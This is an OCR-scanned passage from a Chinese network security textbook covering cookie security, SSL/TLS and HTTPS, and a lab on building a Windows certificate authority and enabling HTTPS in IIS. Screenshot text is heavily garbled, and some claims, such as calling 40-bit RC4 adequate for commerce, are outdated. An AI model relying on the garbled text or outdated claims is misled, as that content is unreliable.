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图 7-10 IE 浏览 器 中 Activex 控件 的 设置 
7.4.3 ”Cookie 的 安全 性 


1. 什么 是 Cookie 


Cookie 是 由 Netscape 开发 并 将 其 作为 持续 保存 状态 信息 和 其 他 信息 的 一 种 方式 。 
Cookie 是 当 用 户 通过 浏览 器 访问 Web 服务 器 时 ， 由 Web 服务 器 发 送 的 、 保 存在 Web 客户 
端的 简单 的 文本 文件 ， 约 由 255 个 字符 组 成 ， 占 4KB 空间 。 

当 用 户 正 在 浏览 站 点 时 ， 它 存储 于 客户 机 的 RAM 中 ; 退出 浏览 器 后 ， 它 存储 于 客户 
机 的 硬盘 上 。 这 个 文件 与 特定 的 Web 文档 关联 在 一 起 ， 保 存 了 该 客户 机 访问 这 个 Web 文 
档 时 的 信息 。 浏 览 器 通过 这 些 特定 的 信息 ， 在 以 后 访问 Web 服务 器 时 为 进一步 交互 提供 
方便 。 


2. Cookie 的 功能 


1) 定制 个 性 化 空间 

用 户 访问 一 个 站 点 ， 可 能 由 于 费用 、 带 宽 限 制 等 原因 ， 并 不 希望 浏览 网 页 所 有 的 内 
容 。Cookie 可 根据 个 人 喜好 进行 栏目 设 定 ， 即 时 、 动 态 地 产生 用 户 所 要 的 内 容 ， 这 就 迎合 了 
不 同 层次 用 户 的 访问 兴趣 ， 减 少 用 户 项 目 选择 的 次 数 ， 更 合理 利用 网 页 服务 器 的 传输 带宽 。 

2) 记录 站 点 轨迹 

由 于 Cookie 可 以 保存 在 客户 机 上 ， 并 在 用 户 再 次 访问 该 Web 服务 器 时 读 回 ， 这 一 特 
性 可 以 帮助 我 们 实现 很 多 设计 功能 ， 如 显示 用 户 访问 该 网 页 的 次 数 、 上 一 次 的 访问 时 间 ， 
记录 用 户 以 前 在 本 页 中 所 做 的 选择 ， 等 等 。 

Cookie 是 以 纯 文 本 的 形式 存在 的 ， 在 浏览 器 和 服务 器 之 间 传 送 时 ， 任 何 可 以 截取 Web 
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通信 的 人 ， 都 可 以 读 取 Cookie。 
在 使 用 Cookie 时 ， 不 要 在 其 中 保存 用 户 名 、 密 码 等 敏感 信息 ， 也 不 要 保存 可 能 被 其 他 


截取 Cookie 的 人 控制 的 内 容 。 

要 对 从 Cookie 中 得 到 的 信息 持 怀 疑 态 度 ， 不 要 以 为 得 到 的 数据 就 一 定 是 当初 设想 的 
信息 。 

3. 查看 Cookie 


查看 Cookie 的 一 个 简便 方法 是 在 Intemet Explorer 中 查找 。 

在 Intemet Explorer 中 ， 选 择 “工具 ”一 “Itemet 选项 ”菜单 命令 ， 在 “常规 ”选项 
卡 中 单 击 “ 浏 览 历史 记录 ” 栏 的 “设置 ”按钮 ， 然 后 单 击 “查看 文件 ”按钮 。Internet 
Explorer 将 打开 一 个 窗口 ， 显 示 所 有 的 临时 文件 ， 包 括 Cookie 。 在 窗口 中 查找 以 
“Cookie:” 开 头 的 文件 或 查找 文本 文件 。 双 击 一 个 Cookie， 在 默认 的 文本 文件 中 打开 它 ， 
如 图 7-11 所 示 。 
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图 7-11 查看 Cookie(1) 


也 可 以 在 硬盘 上 查找 Cookie 的 文本 文件 ， 从 而 打开 Cookie。 

Internet Explorer 将 站 点 的 Cookie 保存 在 文件 名 格式 为 <user>@<domain>.txt 的 文件 
中 ， 其 中 <user> 是 账户 名 。 

例如 ， 如 果 用 户 名 称 为 administrator， 访 问 的 站 点 为 www.123.sogou.com， 那 么 该 站 
点 的 Cookie 将 保存 在 名 为 cookie:administrator@123.sogou.txt 的 文件 中 (该 文件 名 可 能 包 
含 一 个 顺序 的 编号 ， 如 cookie:administrator@123.sogou [1].txt。)， 如 图 7-12 所 示 。 
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图 7-12 查看 Cookie(2) 
4. 删除 cookie 文件 
(1) 在 Intemet Explorer 中 ， 选 择 “ 工 具 ” 一 “Interet 选项 ”菜单 命令 。 
(2) 在 “常规 ”选项 卡 上 单 击 “ 浏 览 历 史记 录 ” 栏 的 “删除 ”按钮 。 
(3) 在 “删除 浏览 历史 记录 ”对 话 框 中 ， 选 中 “Cookie 和 网 站 数据 ” 复 选 框 ， 如 图 7-13 
所 示 。 
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图 7-13 删除 Cookie 
5. Cookie 的 安全 设置 
在 正 7.0 中 的 设置 方法 如 下 。 
(1) 选择 浏览 器 的 “工具 ”一 “Intemet 选项 ”菜单 命令 。 
(2) 单 击 “ 隐 私 ” 标 签 。 
(3) 拖 动 设置 滑 块 ， 将 隐私 设置 调整 到 “中 ”等 级 。 设 置 好 后 单 击 “ 高 级 ”， 选 中 
“替代 自动 cookie 处 理 ” 和 “总 是 允许 会 话 cookie” 复 选 框 ， 如 图 7-14 所 示 。 
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7-14 ”Cookie 的 安全 设置 


7.5 利用 CA 证 书 和 SSL 安全 协议 构建 Web 
服务 器 的 安全 配置 


基于 Windows 2008 平台 配置 可 以 实现 利用 SSL 协议 的 安全 IS Web 服务 器 。 如 今 ， 
SSL 安全 协议 广泛 地 用 在 Intemet 和 Intranet 的 服务 器 产品 与 客户 端 产品 中 ， 用 于 安全 地 传 
送 数 据 到 每 个 Web 服务 器 和 浏览 器 中 ， 从 而 保证 用 户 都 可 以 与 Web 站 点 安全 交流 。 本 节 
将 介绍 SSL 安全 协议 在 WEB 服务 器 安全 的 应 用 。 


7.5.1 SSL 协议 


SSL(Secure Sockets Layer， 安 全 套 接 层 ) 及 其 继任 者 传输 层 安全 (Transport Layer 
Security，TLS) 是 为 网 络 通 信 提 供 安 全 及 数据 完整 性 的 一 种 安全 协议 。TLS 与 SSL 在 传输 
层 对 网 络 连接 进行 加 密 。SSL 是 Netscape 研发 ， 用 于 保障 在 Intemet 上 数据 传输 的 安全 ， 
利用 数据 加 密 (Encryption) 技 术 ， 可 确保 数据 在 网 络 上 之 传输 过 程 中 不 会 被 截取 及 窃听 。 

SSL 协议 位 于 TCP/IP 协议 与 各 种 应 用 层 协议 之 间 ， 为 数据 通信 提供 安全 支持 。SSL 
协议 可 分 为 两 层 。 

(1) SSL 记录 协议 (SSL Record Protocol): 它 建 立 在 可 靠 的 传输 协议 (如 TCP) 之 上 ， 为 
高 层 协议 提供 数据 封装 、 压 缩 、 加 密 等 基本 功能 的 支持 。 

(2) SSL 握手 协议 (SSL Handshake Protocol): 它 建立 在 SSL 记录 协议 之 上 ， 用 于 在 实 
际 的 数据 传输 开始 前 ， 通 信 双 方 进行 身份 认证 、 协 商 加 密 算 法 、 交 换 加 密 密 钥 等 。 可 以 提 
供 以 下 服务 : 

@ ”认证 用 户 和 服务 器 ， 确 保 数据 发 送 到 正确 的 客户 机 和 服务 器 。 

@ ”加 密 数 据 以 防止 数据 中 途 被 窃取 。 

@ ”维护 数据 的 完整 性 ， 确 保 数据 在 传输 过 程 中 不 被 改变 。 

SSL 介 于 应 用 层 和 TCP 层 之 间 。 应 用 层 数据 不 再 直接 传递 给 传输 层 ， 而 是 传递 给 SSL 
层 ，SSL 层 对 从 应 用 层 收 到 的 数据 进行 加 密 ， 并 增加 自己 的 SSL 头 。 
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SSL 协议 的 3 个 特性 如 下 : 


(1) 保密 性 : 在 握手 协议 中 定义 了 会 话 密 钥 后 ， 所 有 的 消息 都 被 加 密 。 
(2) 鉴别 性 : 可 选 的 客户 端 认证 ， 和 强制 的 服务 器 端 认证 。 
(3) 完整 性 : 传送 的 消息 包括 消息 完整 性 检查 (使 用 MAC)。 


7.5.2 HTTPS 协议 


HTTPS(Hypertext Transfer Protocol Secure， 超 文本 传输 协议 ) 由 Netscape 开发 并 内 置 于 
其 浏览 器 中 ， 用 于 对 数据 进行 压缩 和 解压 操作 ， 并 返回 网 络 上 传送 回 的 结果 。HTTPS 实际 
上 应 用 了 Netscape 的 完全 套 接 字 层 (SSL) 作 为 HTTP 应 用 层 的 子 层 (HTTPS 使 用 端口 443， 
而 不 是 像 HTTP 那样 使 用 端口 80 来 和 TCP/IP 进行 通信 )。SSL 使 用 40 位 关键 字 作为 RC4 
流 加 密 算法 ， 这 对 于 商业 信息 的 加 密 是 合适 的 。HTTPS 和 SSL 支持 使 用 X.509 数字 认 
证 ， 如 果 需 要 的 话 用 户 可 以 确认 发 送 者 是 谁 。 

HTTPS 是 以 安全 为 目标 的 HITP 通道 ， 简 单 讲 是 HTTP 的 安全 版 。 即 HTTP 下 加 入 
SSL 层 ，HTTPS 的 安全 基础 是 SSL。 

HTTPS 是 一 个 URI scheme( 抽 象 标 识 符 体 系 )， 句 法 类 同 http: 体系 ， 用 于 安全 的 
HTTP 数据 传输 。https://URL 表明 它 使 用 了 HTTPS， 但 HTTPS 存在 不 同 于 HTTP 的 默认 
端口 及 一 个 加 密 /身份 验证 层 (在 HTTP 与 TCP 之 间 )。 这 个 系统 的 最 初 研发 由 网 景 公 司 进 
行 ， 提 供 了 身份 验证 与 加 密 通 信 方 法 ， 它 被 广泛 用 于 万 维 网 上 安全 敏感 的 通信 ， 如 交易 支 
付 。 限制 它 的 安全 保护 依靠 浏览 器 的 正确 实现 以 及 服务 器 软件 、 实 际 加 密 算法 的 支持 。 


7.6 ”小 型 案例 实 训 


1。 架设 证 书 服务 器 (CA 服务 ) 

(1) 证 书 服务 安装 : 在 系统 控制 面板 中 ， 找 到 “添加 /删除 程序 ”选项 ， 在 打开 的 窗口 
中 单 击 左 侧 的 “添加 /删除 Windows 组 件 ” 链 接 ， 在 打开 的 “Windows 组 件 向 导 ” 对 话 框 
的 列表 中 找到 “证 书 服务 ”并 安装 ， 如 图 7-15 所 示 。 


Tindovs 钥 件 向导 





Vindows 


钥 件 去 
可 以 添加 或 般 除 Windors 的 组 件 。 ey 





Ee 
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图 7-15 架设 证 书 服务 器 (1) 
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(2) CA 类 型 ， 有 4 个 选项 ， 这 里 以 “独立 根 CA” 为 例 。 默 认 情 况 下 ，“ 用 自 定义 设 
置 生成 密 钥 对 和 CA 证 书 ” 复 选 框 没有 选中 ， 选 中 之 后 单 击 “ 下 一 步 ”按钮 可 以 进行 密 钥 








图 7-16 架设 证 书 服务 器 (2) 
(3) 公 钥 / 私 钥 对 : CSP 选择 Microsoft Strong Cryptographic Provider， 默 认 “ 散 列 算 
法 ”为 SHA-1，“ 密 钥 长 度 ” 为 2048。 可 以 根据 需要 做 相应 的 选择 ， 这 里 使 用 默认 。 单 击 
“下 一 步 ” 按 钮 ， 如 图 7-17 所 示 。 








到 

到 

[NS IIS DCOM Server 
SELFSIGN_DEFAULT_CONTATNER 








7-17 ”架设 证 书 服务 器 (3) 


(4) CA 识别 信息 : 填写 CA 的 公用 名 称 (以 ABC 为 例 )， 其 他 信息 (如 邮件 、 单 位、 部 
门 等 ) 可 在 “可 分 辨 名 称 后 缀 ”文本 框 中 添加 ，“ 有 效 期 限 ”默认 为 5 年 (可 根据 需要 作 相 
应 改动 ， 此 处 默认 )。 单 击 “ 下 一 步 ”按钮 ， 如 图 7-18 所 示 。 
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7-18 ”架设 证 书 服务 器 (4) 


(5) 证 书 数据 库 设 置 : 用 于 保存 证 书 的 相关 数据 库 和 日 志文 件 ， 保 持 默认 即 可 ， 如 
7-19 所 示 。 


证 书 数据 库 设置 
答 入 证 书 数 据 库 、 数 据 库 日 志和 配置 信息 的 位 置 . 





图 7-19 ”架设 证 书 服务 器 (5) 


(6) 证 书 服务 器 安装 完成 : 单 击 “ 下 一 步 ”按钮 进入 组 件 的 安装 ， 安 装 过 程 中 可 能 
弹出 如 下 窗口 ， 如 图 7-20 所 示 。 








图 7-20 消息 窗口 (1) 
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单 击 “ 是 ”按钮 ， 继 续 安装 ， 可 能 再 弹出 如 下 窗口 ， 如 图 7-21 所 示 。 


四 


可 项 和 抽 有志 扫 和 和 二 区 和 












7-21 消息 窗口 (2) 


由 于 安装 证 书 服务 的 时 候 系统 会 自动 在 IIS 中 (这 也 是 为 什么 必须 先 安装 IIS 的 原因 ) 添 
加 证 书 申请 服务 ， 该 服务 系统 用 ASP 编写 ， 所 以 必须 为 TS 启用 ASP 功能 ， 单 击 “ 是 ” 按 
钮 继续 安装 ， 完 成 证 书 服务 的 安装 ， 如 图 7-22 所 示 。 


完成 “Windows 组 件 向 导 ” 


您 已 成 功 地 完成 了 Windows 组 件 向 导 . 


要 关闭 此 向 导 ， 请 单 击 “ 完 成 ”。 


7-22 ”架设 证 书 服务 器 (6) 


(7) 安装 完成 后 ， 在 控制 面板 的 “管理 工具 ”窗口 中 就 可 以 打开 证 书 颁发 机 构 ， 如 
图 7-23 所 示 。 





| 
文件 四 ”所作 查看 开 助 0 | 
妇 洱 | 笑 | 加 | 回 娩 |@ | 

证 书 颁 发 机 构 本 地 ) 请 中 请 人 交 证 书 模板 | 序列 号 效 日 其 











ABC 
各 吊销 的 证 书 
' 习 类 发 的 证 书 
国 挂 起 的 申请 
国 失败 的 申请 














图 7-23 ”架设 证 书 服务 器 (7) 


这 样 ， 服 务 器 成 功 配 置 完 公用 名 为 ABC 的 独立 根 CA，Web 服务 器 和 客户 端 可 以 通过 
访问 该 服务 器 的 IIS 证 书 申请 服务 申请 相关 证 书 。 
(8) 安装 完成 后 ， 在 IS 中 还 会 增加 3 个 相关 的 目录 ， 其 中 的 CertSrv 就 是 证 书 申请 的 
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虚拟 目录 ， 如 图 7-24 所 示 。 


C:ANTINDOWS\Systen32\ .. 
C:WWTINDOWSAsysten32\ 
C:AWTIDOWS\systen32\ .. 
C:WWTNDOWSAsysten32\ 


让 


电信 人 ati on 
由 为 Web 服务 扩展 
由 - 海 默认 SHTP 虚拟 服务 器 











图 7-24 ”架设 证 书 服务 器 (8) 
2. 设置 IIS 开启 HTTPS(SSL) 功 能 


(1) 开启 服务 器 证 书 : 在 IIS 中 的 “默认 网 站 ” 右 击 ， 选 择 “ 属 性 ”命令 ， 可 看 到 网 站 
属性 ， 单 击 “ 目 录 安 全 性 ”标签 ， 再 单 击 “ 服 务 器 证 书 ” 按 钮 ， 如 图 7-25 所 示 。 
EE 





图 7-25 设置 lIS 开启 HTTPS 功能 (1) 
(2) 新 建 服务 器 证 书 : 选择 “新 建 证 书 ” 选 项 ， 单 击 “ 下 一 步 ”按钮 ， 如 图 7-26 所 示 。 


.oa 


J mmm 计算 机 网 络 安全 教程 





IIS 证书 向 导 


服务 器 证 书 SS 
以 下 是 为 网 站 分 配 证 书 的 方法 。 sg 








7-26 设置 IIS 开启 HTTPS 功能 (2) 


(3) 证 书 请 求 : 选中 “现在 准备 证 书 请 求 ， 但 稍 后 发 送 ” 单 选 按钮 ， 如 图 7-27 所 示 ， 
单 击 “ 下 一 步 ” 按 钮 。 





延迟 或 立即 请 求 
可 以 礁 备 证 书 请 求 以 备 稍 后 发 送 ， 也 可 以 立即 发 送 。 








7-27 ”设置 IS 开启 HTTPS 功能 (3) 


(4) 名 称 和 安全 性 设置 : “名 称 ” 可 以 根据 需要 更 改 ， 不 影响 证 书 的 使 用 。“ 位 长 ” 
默认 为 1024， 一 般 已 经 足够 安全 ， 数 值 越 大 就 越 安 全 ， 但 是 数值 越 大 系统 的 处 理 速度 就 会 
越 慢 。 如 图 7-28 所 示 ， 单 击 “ 下 一 步 ”按钮 。 

(5) 单位 信息 : 填写 信息 ， 会 在 证 书 中 显示 ， 如 图 7-29 所 示 ， 单 击 “ 下 一 步 ”按钮 。 

(6) 站 点 公用 名 称 : 这 一 步 很 关键 。 公 用 名 称 不 能 随便 更 改 ， 只 能 是 该 网 站 的 DNS， 
如 果 尚 未 申请 DNS 则 可 以 用 人 P 地 址 代替 。 默 认 情况 下 是 服务 器 的 计算 机 名 ， 但 这 种 情况 
只 适合 于 企业 机 构 (AD 管理 )。 这 里 要 配置 的 是 独立 机 构 ， 所 以 公用 名 称 只 能 是 DNS 或 人 Pp 
地 址 。 如 图 7-30 所 示 ， 单 击 “ 下 一 步 ”按钮 。 
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FE > 
名 称 和 安全 性 设置 
新 证 书 必须 具有 名 称 和 特定 的 位 长 。 








输入 新 x 证书 的 名 称 。 此 名 称 应 易于 引用 和 记忆 。 
名 称 旭 : 


EE 


丽人 Km 让 了 证 Ht 程度 位 长 起 长 ,安全 性 越 高 。 然而 ,位 长 过 长 格 使 性 能 降 


位 长 D: [oz = 


厂 选择 证 书 的 加 密 服务 提供 程序 (CSP) EE) 


| 
7-28 设置 IIS 开启 HTTPS 功能 (4) 





单位 信息 


证 书 必须 包 合 您 单位 的 相关 信息 ， 以 便 与 其 地 单位 的 证 书 区 分 开 。 





选择 或 输入 您 的 单位 和 部 门 名 称 。 通 常 是 指 您 的 合法 单位 名 称 及 部 门 名 称 。 


加 和 需 详细 信息 ， 请 参阅 证 书 颁发 机 构 的 网 站 。 
单位 @) 
[rheners E| 


Ea 








mm | 
7-29 设置 IIS 开启 HTTPS 功能 (5) 


IIS 证 书 向 导 x| 


站 点 公用 名 称 
站 点 公用 名 称 是 其 完全 合格 的 域名 。 











站 点 的 公用 名 称 。 Internet 上 ， 应 使 用 有 效 的 DNS 名 ,加 果 服务 器 
Intranet 上 ， 可 以 使 用 + NetBIOS 名 。 

如 果 公用 名 称 发 生变 化 ， 则 需要 获取 新 证 书 . 

公用 名 称 CC): 


192. 168.3.201 





mg | 
图 7-30 设置 IIS 开启 HTTPS 功能 (6) 
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(7) 地 理 信息 : 这 些 信 息 也 将 是 CA 管理 员 的 审核 对 象 。 如 图 7-31 所 示 ， 单 击 “ 下 


一 步 ” 按 钮 。 
地 理 芒 息 
证 书 颁发 机 构 要 求 下 列 地 理 信息 。 








国家 区 ) 人 ) 


人 中国) | 





省 /自治 区 和 市 县 必须 是 完整 的 官方 名 称 ， 且 不 能 包 全 缩写 。 





mW | 
7-31 设置 IIS 开启 HTTPS 功能 (7) 


(8) 证 书 请 求 文件 名 : 默认 是 保存 在 C 盘 下 ， 打 开 后 会 看 到 一 串 加 密 的 字符 串 。 这 一 
步 将 这 些 信息 以 Base64 编码 的 形式 保存 在 本 地 ，Web 管理 员 可 以 用 编码 到 CA 证 书 申请 
系统 进行 证 书 的 申请 。 如 图 7-32 所 示 ， 单 击 “ 下 一 步 ”按钮 。 








IIS 证 书 内 导 FE 
证 书 请 求 文件 名 SS 
以 指定 的 文件 名 将 证 书 请 求 保存 为 文本 文件 。 ES 
输入 证 书 请 求 的 文件 名 。 
文件 名 外 ); 
浏览 8). 





《上 - 步 四 [下 -和 步 中 ?让 取消 | 





图 7-32 设置 IIS 开启 HTTPS 功能 (8) 


(9) 请 求 文件 摘要 : 就 是 数字 证 书 的 本 地 信息 ，CA 管理 员 将 对 其 进行 审核 ， 并 决定 是 
否 颁 发 。 如 图 7-33 所 示 ， 单 击 “ 下 一 步 ” 按 钮 ， 完 成 IS 证 书 的 创建 ， 如 图 7-34 所 示 。 
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IIS 证 书 床 导 


请 求 文件 项 要 
已 选择 生成 请 求 文件 。 








单 击 “ 下 一 步 ”按钮 生成 下 列 请 求 。 
文件 名 : ciN\certreq. txt 


请 求 包含 下 列 信 息 : 
象 192. 168 3.20 
3 默认 网 站 
) CH 
最 。 
a 
部 门 xxjsx 





上 -上 [ED ww | 


7-33 设置 IIS 开启 HTTPS 功能 (9) 


完成 Web 服务 器 证 书 向 导 


Bs eb 服务 器 证 书 向 导 。 创 蛙 了 一 个 证 书 请 求 并 到 


忆 保 站 色 下 列 妇 件 中 :e:\docunents and 
settings\administrat. .. \certreg. txt。 将 此 文件 
前 人 全 人 直送 划 和 忆 入 物证 


附加 到 器 中 。 


单 击 “ 完 成 ”按钮 关闭 向 导 。 


庄 扣 客机 构 拉夫 江 
站 文件。 重新 避 动 此 向 导 ， 格 新 证 
虑 的 服务 





‘som w | 


图 7-34 设置 IIS 开启 HTTPS 功能 (10) 
3. 申请 证 书 





(1) 复制 证 书 的 加 密 串 : 先 将 证 书 的 加 密 串 复制 下 来 ， 前 往 证 书 申请 页 面 ， 单 击 “ 申 


请 一 个 证 书 ” 链 接 ， 如 图 7-35 和 图 7-36 所 示 。 
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胞 certrea. tzt - 记事 本 
文件 轩 锭 避 中 格式 Q) 查看 WW 帮助 








人 BEGIN NEW CERTIFICATE REQUEST-————— 全 
IMIIDPZCCAqgCAQAWZDELMAKGAT1UEBhMCQ84xDTALBgNUBAgeBFMXTqwxDTAL 
BgNU 
BAceBFMXTqwxEDAOBgNUBAoTB3poZWHSnZmExDjAMBgNUBASTBXh4anNs4MRUw 
EwYD 


UQQDEwwxOTIUMT YL jMuMjAwg28wDQY JKoZIhvucNAQEBBQADgY BAMIGJAOGB 
ola D5PCoE Bel1lFyHGBCU 
TngnusFqhmdonaiounrSLACcnengr opif olWgdnet2o05nAFFOsD ed 
ee 
pj rngpeDnntts ny inoTAuNin7Bgor DgEEAYISNg EazA0B HO 
nooo Ti hiram ng i 
Monoemhacegssonvlmwosceaeslbapgnahennuauagmoeecsengur 


MIH9BgorBgEERYI3DQICHYHuMIHrngEBHIonTQBphGHhcgBuhHMhbwBmhHQn 





7-35 ”申请 证 书 (1) 






Er CE El 
文件 四 ”编辑 世 ) 查看 WD 收 诚 工具 CD) 帮助 0 | 
四 凶 .可 -品目 区 | 万 拉 过 二 收 总 天 让 措 体 克 | 器 













Hicrosoft 证 书 服 和 主页 


欢迎 

使 用 此 网 站 为 您 的 Web 浏览 器 ， 电 子 邮件 客户 端 或 其 他 程序 申请 一 个 证 书 。 通 过 
使 用 证 书 ， 您 可 以 向 通过 Web 通信 的 人 确认 您 的 身份 ， 签 署 并 加 密 邮件 ， 并 且 ,， 
根据 您 申请 的 证 书 的 类 型 ， 执 行 其 他 安全 任务 。 


您 也 可 以 使 用 此 网 站 下 载 证 书 颁发 机 构 (CA) 证 书 ， 证 书 链 ， 或 证 书 吊销 列表 
(CRL)， 或 查看 挂 起 的 申请 的 状态 。 


有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文档 . 











图 7-36 ”申请 证 书 (2) 
(2) 申请 一 个 证 书 : 单 击 “高 级 证 书 申请 ”链接 ， 如 图 7-37 所 示 。 


ETIET I 





文件 四 编辑 到 ) 查看) 收 着 由 ) 工具 如 ) 帮助 00) 
昌 恨 -器 -器 司 的 | 让 扫 当 六 和 如 人 | -> 局 
二 十 加 [加 htty://192 163.3 20/certsry/csrtraas as 



































图 7-37 ”申请 证 书 (3) 
(3) 高 级 证 书 申请 : 单 击 “ 使 用 base64 编码 的 CMC 或 PKCS#10 文件 提交 一 个 证 书 申 
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请 ， 或 使 用 base64 编码 的 PKCS#7 文件 续 订 证 书 申 请 ”链接 ， 如 图 7-38 所 示 。 


mi cresoft 证 书 服务 一 
文件 如 ”编辑 中 查看 WD 收藏 和 ) 工具 中) 帮助 四 
回民 - 避 -四 | 让 扫 案 闪 收 天 好 着 信 如 | -已 


半 让 | 夸 htp://192_ 168 3.20/certsrv/certrasd asp 











icrosoft Internet Explorer 

















高 级 证 书 申请 





CA 的 策略 决定 您 可 以 申请 的 证 书 类 别 。 单 击 下 列 选项 之 一 来 : 
向 此 CA 提交 一 个 申请 。 


使 用 base64 编码 的 CIC 或 PECS 机 0 文件 提交 一 个 证 书 申请 ， 或 使 用 base64 编码 的 








7-38 ”申请 证 书 (4) 


(4) 提交 证 书 : 将 证 书 编码 填 入 文本 框 中 ， 并 单 击 “ 提 交 ” 按 钮 。 至 此 ， 完 成 了 证 书 
的 申请 ， 如 图 7-39 和 图 7-40 所 示 。 


ET 
文件 人 辆 虽 加， 查看 oD 收藏) 工具 四 玫 助 9 
加 展 -日 -站 有 总 | 让 扫 雪 说 收 二 天 周期 体 本 | 地 喇 


天 十 加 | 图 htps: /tse 100.3 20/certsrv/eer wat esp 


ra 













提交 一 个 证 书 申请 或 续 订 申请 


要 提交 一 个 保存 的 申请 到 CA， 在 “保存 的 申请 ” 框 中 粘贴 一 个 由 外 部 源 ( 
请 或 PECS #7 续 订 申 清 。 





保存 的 申请 : 
性 BECIN NEUV CERTIFICATE REQUEST----— | 
Base-64 编 则 的 |xIIDPzcCAqgcAQAw2DELNAkGAlUzBhNCQO4xDTAL 
证 书 申请 15aceBFHXTqwxEDAOBGNVBhoTB3pozWSnzmExDJAI 
(CHC 要 QQDE waxOTIANTYALINuNIA wg ZO DOYI KOZIhveN 
PKCS #10 或 。 |eoUpasVEs6eLsQgriXAsbh/tFCDOebyJID InN2 
PRECS #7): |TnapvsfahmaopaiogR6rs14CckzWap9plfToWa 可 
» 





附加 属性 ; 








ee | 上 
7-39 ”申请 证 书 (5) 
地 址 四 ) 出 http-//192. 168 3. 20/certsrv/certfnsh asp 
引 
证 书 挂 起 
您 的 证 书 申请 已 经 收 到 。 但 是 ， 您 必须 等 符 管理 员 颁发 您 申请 的 证 书 。 
您 的 申请 Id 为 2。 


请 在 一 天 或 两 天 内 返回 此 网 站 以 检索 您 的 证 书 。 
注意 : 您 必须 用 此 Web 浏览 器 在 10 天 内 返回 以 检索 您 的 证 书 














4 Ly 一 


图 7-40 ”申请 证 书 (6) 
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(5) 证 书 颁发 机 构 : 回 到 证 书 颁 发 机 构 工具 中 ， 选 择 左边 的 “ 挂 起 的 申请 ”选项 ， 可 
以 看 到 里 面 有 一 条 申请 记录 ，“ 申 请 ID ” 值 就 是 刚才 申请 的 ID 。 

选中 记录 ， 单 击 右键 ， 选 择 “ 所 有 任务 ”一 “颁发 ”命令 ， 这 样 即 可 以 颁发 证 书 了 。 
单 击 “ 颁 发 的 证 书 ” 分 支 ， 就 可 以 看 到 刚刚 颁发 的 证 书 了 ， 如 图 7-41 和 图 7-42 所 示 。 
文件 中， 操作 全 ) 查看 加 ” 必 肋 0 | 


斧 | 凶 | 妈 | 日 恕 | 龟 因 


[ 夯 这 二 浆 机 构 叶 地 ) 
王国 nmEReA 



































7-41 申请 证 书 (7) 





| 国 宁 | 奋 夯 | 四 加 | 区 








图 7-42 ”申请 证 书 (8) 
(6) 查看 证 书 的 状态 : 再 回 到 证 书 申请 页 面 ， 单 击 “ 查 看 挂 起 的 证 书 申请 的 状态 ” 链 


接 ， 如 图 7-43 所 示 。 














http /is2 166 3 20/certsrw 
王 crosoft 证 书 服务 ~ 


欢迎 


使 用 此 网 站 为 您 的 Web 浏览 器 ， 电 子 邮 件 客 户 端 或 其 他 程序 申请 一 个 证 书 。; 思 
团 并 加 密 邮 件 ， 并 且 ， 根 据 您 申请 的 证 书 的 类 型 ， 执 行 其 他 安全 任务 。 


您 也 可 以 使 用 此 网 站 下 载 证 书 颁 发 机 构 (CA) 证 书 ， 证 书 链 ， 或 证 书 吊销 列表 (( 
有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文档 . | 











图 7-43 ”申请 证 书 (9) 
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在 这 个 页 面 可 以 看 到 之 前 申请 的 所 有 证 书 ， 单 击 其 中 一 条 ， 如 图 7-44 所 示 。 





TEL 
工具 
国 区 | 万 天 言 收 京 天 如 欣 作 全 | -> 已 






可 











eer: sr eert ebpn 











Wicrosoft 








查看 挂 起 的 证 书 申请 的 扰 态 








请 选择 您 要 查看 的 证 书 申请 : 
Web 浏览 器 














7-44 ”申请 证 书 (10) 


(7) 下 载 颁 发 的 证 书 : 如 果 是 已 经 颁发 的 证 书 ， 可 以 看 到 证 书 下载 页 面 ， 一 般 选 择 
“Base 64 编码 ”， 单 击 “ 下 载 证 书 ” 链 接 。 单 击 “ 下 载 证 书 链 ” 链 接 ， 可 以 把 根 CA 的 证 


书 也 一 起 下 载 ， 如 图 7-45 所 示 。 单 击 “保存 ”按钮 ， 下 载 证 书 到 某 个 路 径 ， 如 图 7-46 所 示 。 
4. 安装 证 书 


(1) 处 理 请 求 的 证 书 : 如 图 7-25 所 示 ， 此 时 界面 已 改变 ， 选 择 “ 处 理 挂 起 的 请 求 并 安 
装 证 书 ” 选 项 ， 单 击 “ 下 









加 银 .加 - 曲 日 仙 万 村 六 村 新作 外 | 器 
琅 这 | 辐 http /82 168 3 /eertarvfeertfpah as 











有 
证 书 已 颁发 


您 申请 的 证 书 已 颁发 褒 您 。 


CDER 编码 或 
图 域 于 





7-45 ”申请 证 书 (11) 


Wm] OY 








您 想 要 打开 文件 还 是 格 它 保存 到 史 的 计算 机 ? 


Hw | CE] we | wsew| 
区 芋 有 开 这 种 类 型 的 文件 前 将 等 询问 硬 ) 














图 7-46 ”申请 证 书 (12) 


(aN. 





7-47 ”安装 证 书 (1) 


(2) 选择 证 书 : 选择 刚 下 载 的 证 书 ， 单 击 “ 下 一 步 ” 按 钮 ， 如 图 7-48 所 示 。 
(3) SSL 端口 : 填写 SSL 使 用 的 端口 ， 一 般 默认 是 443。 单 击 “ 下 一 步 ” 按 钮 ， 如 
图 7-49 一 图 7-51 所 示 ， 至 此 ， 便 完成 了 证 书 的 安装 。 





图 7-48 安装 证 书 (2) 





7-49 ”安装 证 书 (3) 
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IIS 证 书 启 导 本 
证 书 基 要 
已 选择 人 中 应 文件 实 装 证 节 。 > 
单 击 “下 一 步 ” 控 角 安装 下 列 下 节 。 
文件 各 Ceertaer er 
证 书 六 组 信息 - 
192. 168. 3.20 
4 
2011-5-1} 
提 
shenefs 
ej 
< sw we | 
7-50 ”安装 证 书 (4) 
SE 
完成 Web 服务 器 证 书 向 导 
已 区 功 郊 威 Teb 服务 器 焉 书 应 导 。 
此 服务 器 上 现在 已 安装 了 证 书 ， 
加 果 格 来 尖 要 更 新 、 曾 执 职 划 队 证书， 可 重新 去 行 向 凶 。 
单 击 “ 完 成 ” 按 汪 关闭 身 导 。 
ww | 








7-51 安装 证 书 (5) 
5. 利用 CA 证 书 和 SSL 安全 协议 构建 Web 服务 器 的 安全 配置 


(1) 查看 证 书 : 如 果 要 安全 使 用 HTTPS 访问 网 站 ， 在 “目录 安全 性 ”选项 卡 中 ， 单 击 
“查看 证 书 ” 按 钮 ， 如 图 7-52 和 图 7-53 所 示 。 


















































x | 
har | 国 一 一 一 -一 | [入 现下 | 信息 | 证 #88 从 | 
AAR 国 | eema 
人 LE 这 个 证 书 的 目的 如 下 : 
